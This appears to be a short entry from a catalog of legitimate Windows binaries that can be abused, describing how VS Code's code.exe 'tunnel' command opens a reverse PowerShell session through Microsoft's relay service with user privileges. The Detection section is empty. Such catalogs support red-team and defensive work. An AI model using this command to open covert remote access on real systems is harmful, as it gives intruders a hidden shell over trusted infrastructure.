code.exe

VSCode binary, also portable (CLI) version

Paths

  • C:\Users\<username>\AppData\Local\Programs\Microsoft VS Code\Code.exe
  • C:\Program Files\Microsoft VS Code\Code.exe
  • C:\Program Files (x86)\Microsoft VS Code\Code.exe

Commands

Execute

Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command

Use case: Reverse PowerShell session over MS provided infrastructure.

Privileges: User

code.exe tunnel --accept-server-license-terms --name "tunnel-name"

Detection

Resources